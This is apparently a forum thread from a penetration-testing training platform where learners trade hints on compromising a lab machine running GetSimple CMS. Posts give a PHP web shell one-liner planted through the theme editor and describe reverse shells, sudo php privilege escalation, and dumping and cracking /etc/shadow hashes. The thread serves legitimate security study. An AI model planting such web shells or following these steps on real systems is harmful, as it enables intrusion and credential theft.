Getting started | Knowledge Check

Is there any other Way to get into without using metasploit(Because using metasploit was pretty simple in this one i was able to capture the Userflag without any hustle) because i was able to login as admin and i was searching possible vulns on the web but i am not able to find any successful method(I tried editing the themes for php Reverse shell but there was no response) I am still trying to look for a potential way to exploit it without using Metasploit… If anyone has found something …we can Discuss :smile:

Hey guys. I’m still working on this task (almost 1 week) and I have no idea how escalate privileges. I use metasploit for it and already improve the shell but whats next? Could someone give a little nudge?

I’m stuck on the priv esc portion as well, I’m sure that the /usr/bin/php binary plays a role in escalating privileges, I’m just not quite sure how to proceed

Type your comment> @galertaw said:

So i now be able to spawn a bash reverse shell and run linpeas. But it says nothing intresting besides php NOPASSWD running that i know before by ‘sudo -l’
Keep searching

How were you able to transfer the Linpeas and how does your sudo -l worked? i was not able to access any other commands like sudo and echo … but i was able to spawn a web shell using the ThemeEditor it was working but still was not able to use other commands only ls and cat and may be some more of the defaults.

Ok so here is one Interesting thing i got … I was able to spawn a web shell using the Following steps –
.
.
1.i was able to login as admin through the page
2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET[‘e’].’ 2>&1’); ?>
(remove the ,(commas) I had to use them or the forum was glitching)
5.then i tried the sudo -l command and it worked …(remember to url-encode spaces to run commands)
this is my progress until now…

Type your comment> @SPARTANone17 said:

Ok so here is one Interesting thing i got … I was able to spawn a web shell using the Following steps –
.
.
1.i was able to login as admin through the page
2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET[‘e’].’ 2>&1’); ?>
(remove the ,(commas) I had to use them or the forum was glitching)
5.then i tried the sudo -l command and it worked …(remember to url-encode spaces to run commands)
this is my progress until now…

Thanks, following your steps led me to the initial shell. From here though, i had to get a true reverse shell to exploit a certain binary that sudo can run on. Gtfobins led the way for me afterwards!

Finally!!! Jessus…you have to be fast, otherwise the machines just dies

Type your comment> @dewest91 said:

Type your comment> @SPARTANone17 said:

Ok so here is one Interesting thing i got … I was able to spawn a web shell using the Following steps –
.
.
1.i was able to login as admin through the page
2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET[‘e’].’ 2>&1’); ?>
(remove the ,(commas) I had to use them or the forum was glitching)
5.then i tried the sudo -l command and it worked …(remember to url-encode spaces to run commands)
this is my progress until now…

Thanks, following your steps led me to the initial shell. From here though, i had to get a true reverse shell to exploit a certain binary that sudo can run on. Gtfobins led the way for me afterwards!

How were you able to get a true REVERSE SHELL!!! i tried like 50 times till now and still i am not able to spawn a true shell i know afterwards that i have to exploit the php vulnerablity using the gtfobins but how ? please help…

Type your comment> @SPARTANone17 said:

Type your comment> @dewest91 said:

Type your comment> @SPARTANone17 said:

Ok so here is one Interesting thing i got … I was able to spawn a web shell using the Following steps –
.
.
1.i was able to login as admin through the page
2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET[‘e’].’ 2>&1’); ?>
(remove the ,(commas) I had to use them or the forum was glitching)
5.then i tried the sudo -l command and it worked …(remember to url-encode spaces to run commands)
this is my progress until now…

Thanks, following your steps led me to the initial shell. From here though, i had to get a true reverse shell to exploit a certain binary that sudo can run on. Gtfobins led the way for me afterwards!

How were you able to get a true REVERSE SHELL!!! i tried like 50 times till now and still i am not able to spawn a true shell i know afterwards that i have to exploit the php vulnerablity using the gtfobins but how ? please help…

I uploaded a php web shell on the theme editor page, then setup a listener on my local machine, and used a php reverse shell one liner.

Type your comment> @dewest91 said:

Type your comment> @SPARTANone17 said:

Type your comment> @dewest91 said:

Type your comment> @SPARTANone17 said:

Ok so here is one Interesting thing i got … I was able to spawn a web shell using the Following steps –
.
.
1.i was able to login as admin through the page
2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET[‘e’].’ 2>&1’); ?>
(remove the ,(commas) I had to use them or the forum was glitching)
5.then i tried the sudo -l command and it worked …(remember to url-encode spaces to run commands)
this is my progress until now…

Thanks, following your steps led me to the initial shell. From here though, i had to get a true reverse shell to exploit a certain binary that sudo can run on. Gtfobins led the way for me afterwards!

How were you able to get a true REVERSE SHELL!!! i tried like 50 times till now and still i am not able to spawn a true shell i know afterwards that i have to exploit the php vulnerablity using the gtfobins but how ? please help…

I uploaded a php web shell on the theme editor page, then setup a listener on my local machine, and used a php reverse shell one liner.

BUT were you able to navigate out of the current working Directory because last time i tried i wasn’t able to navigate out of the current working Directory. and thats not it how were you able to use the php webshell and listen onto your device…How were you able to use a Listner to A PHP webshell because a webshell can be accessed by using the Web browser or the cURL .
But i am goona try it now and Explore myself I will read your answer after i complete the module :smiley:

Type your comment> @SPARTANone17 said:

Type your comment> @dewest91 said:

Type your comment> @SPARTANone17 said:

Type your comment> @dewest91 said:

Type your comment> @SPARTANone17 said:

Ok so here is one Interesting thing i got … I was able to spawn a web shell using the Following steps –
.
.
1.i was able to login as admin through the page
2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET[‘e’].’ 2>&1’); ?>
(remove the ,(commas) I had to use them or the forum was glitching)
5.then i tried the sudo -l command and it worked …(remember to url-encode spaces to run commands)
this is my progress until now…

Thanks, following your steps led me to the initial shell. From here though, i had to get a true reverse shell to exploit a certain binary that sudo can run on. Gtfobins led the way for me afterwards!

How were you able to get a true REVERSE SHELL!!! i tried like 50 times till now and still i am not able to spawn a true shell i know afterwards that i have to exploit the php vulnerablity using the gtfobins but how ? please help…

I uploaded a php web shell on the theme editor page, then setup a listener on my local machine, and used a php reverse shell one liner.

BUT were you able to navigate out of the current working Directory because last time i tried i wasn’t able to navigate out of the current working Directory.

Ok i was able to Get the Root flag as well … Thanks for the help @dewest91 :smile:

I wonder if anyone is able to offer a helping hand as i’m unsure as how to progress, I have managed to gain a foothold by using the Get simple msf exploit and have submitted the user flag however when trying to upload LinEnum I get the 200 OK response but then followed by permission denied?

I’m sure i’m doing something wrong (as this is the case most time) but I’m just wondering if I am missing something stupidly obvious?

Just to be clear… LinEnum.sh onto the target machine by using wget http://10.10.16.95:8080/LinEnum.sh then receive the following -

'–2021-06-28 09:56:14-- http://10.10.16.95:8080/LinEnum.sh
Connecting to 10.10.16.95:8080… connected.
HTTP request sent, awaiting response… 200 OK
Length: 46631 (46K) [text/x-sh]
LinEnum.sh: Permission denied

Cannot write to ‘LinEnum.sh’ (Permission denied).’

1 Like

So I was able to run a reverse shell via the upload command in msfconsole and curl… then… Stuck.

Yes I uploaded a linenum.sh and linpeash.sh and ran
them. Found exploits by grepping CVE in the reports… But they don’t apply.

Like there’s a sudoedit vulnerability that appears to be patched already even though the version should expose something (ran a python and a a compiled C program) but the sudoedit output indicates it was fixed.

Sudo -l … Nothing exciting

Dirty_sock/Snap-confine is shown in the report but the uploading a python exploit says it’s not vulnerable.

So round and round I go for days, trying to do this. And the kicker is, usually if you know the right answer it takes 60 seconds.

The hint points to the linpeas.sh report but I got nothing.

Oh I see now. Much simpler than I was headed.

Nevermind.

I’ve just completed this one. The first flag (just getting a foot hold) was quite easy but the second (privilege escalation) took me a full day to figure out. I think the point was to ssh into the box as a more privileged user and get the second flag. I did that but its not actually necessary - you can get to the flag as a ‘low privilege user’ without having to ssh.

The hint for how i did it is:

  1. (You need to get a shell on the target).

  2. Look for the command available to you with sudo privileges - a comment above says linpeas/linenum does not help but it showed me exactly what i needed.

  3. Find how to call system commands (through that command as sudo) to access the restricted folders.

For fun(?) I then plundered etc/shadow, got the password hash of a user with sudo privileges, cracked it in hashcat, then ssh’ed in the target machine and got the flag. But to get to the shadow file you get the same privileges required to get the flag so its not actually necessary.

I hope that helps

2 Likes

Hello everyone, I share my experience of how I found the first file and what steps I followed;
Before all the scanning and a little research, I was able to put in a shell with metasploit, using module 1. How does it work? well this exploit creates a php file of the session created by meterpreter. So what I did was edit that file and enter the shell code, which after that allowed me to scratch and get the first file from user.txt. Now I’m going for the second flag.

You on the right way!

Could someone help me with this? I have been stuck for the past 1 week but I am just not able to log in! I believe I found the password but I kind of suspect it’s an encrypted one! I tried decrypting it but no luck! As a result, I am not able to log in and so am not able to gain the initial foothold!

Yes, It should be encrypted. You can try searching hash detecter on google and paste that key there to see what type of hash you want to decrypt and then, you can try different tools like john and hashcat to decrypt it. If you don’t know how to use them search on Internet. It’s supposed to be this way don’t worry you are on the right learning path.

Okay I got in. I tried searching around the website but the upload button doesn’t seem to be working. Is there any other way I can upload the shell ?. I tried creating a new page but that didn’t work